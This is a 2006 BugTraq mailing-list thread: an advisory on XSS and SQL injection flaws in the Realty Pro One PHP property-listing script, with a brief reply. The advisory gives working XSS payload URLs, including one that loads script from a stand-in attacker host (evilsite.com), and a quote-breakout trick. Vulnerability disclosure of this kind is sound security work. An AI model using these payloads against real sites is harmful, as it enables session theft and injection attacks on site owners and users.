BugTraq
RE: Realty Pro One Property Listing Script May 25 2006 06:21PM
Krpata, Tyler (tkrpata bjs com)
Isn't the SQL injection vulnerability a bit more critical here?

-----Original Message-----
From: luny (at) youfucktard (dot) com [email concealed] [mailto:luny (at) youfucktard (dot) com [email concealed]]
Sent: Tuesday, May 23, 2006 7:39 PM
To: bugtraq (at) securityfocus (dot) com [email concealed]
Subject: Realty Pro One Property Listing Script

Realty Pro One

http://realtypro1.2run2.com/index.php

Description:

Realty Pro One is a powerful property listing tool with many features.

Effected files:

searchlookup.php

images.php

index_other.php

request_info.php

?listingid

Exploits & Vulns:

XSS Vulnerability by the listingid variable:

http://www.example.com/listings/?listingid=<SCRIPT%20SRC=http://evilsite

.com/xss.js></SCRIPT>

Also outputs SQL Query error msg:

You have an error in your SQL syntax. Check the manual that corresponds
to your MySQL server version for the right syntax to use near 'This is
remote text via xss.js located at
evilsite.comPHPSESSID=f085540569ca117edda59a119e98fcc4 ORDER BY rl_re

More XSS Vulnerabilities:

http://www.example.com/search/searchlookup.php?propertyid=200 or [XSS]

http://www.example.com/images.php?id=[XSS]

http://www.example.com/listings/index_other.php?listingid=[XSS]

By putting "> and <" infront and behind our script tags:

http://www.example.com/listings/request_info.php?agentid=101005">[XSS]<"

&listtype=homes&listingid=222003

No version # for this script was given on the website.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus